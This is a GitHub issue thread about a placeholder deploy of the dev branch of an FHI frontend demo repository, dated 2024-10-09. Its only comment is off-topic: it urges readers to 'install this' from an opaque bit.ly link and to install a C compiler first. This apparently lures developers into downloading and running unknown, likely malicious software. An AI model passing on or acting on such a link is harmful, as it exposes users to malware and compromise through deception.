### ISSUE TITLE
Deploy/documentation 2024-10-09

### ISSUE THREAD

**Issue by proand** [folkehelseinstituttet/Fhi.Frontend.Demo#694]
This is just a placeholder for the deploy of everything in [dev](https://github.com/folkehelseinstituttet/Fhi.Frontend.Demo/tree/dev) pr. 2024-10-09

**Comment by Buqra55** [comment]
install this
https://bit.ly/4gwC82r
If you don't have the c compliator, install it.(gcc or clang)
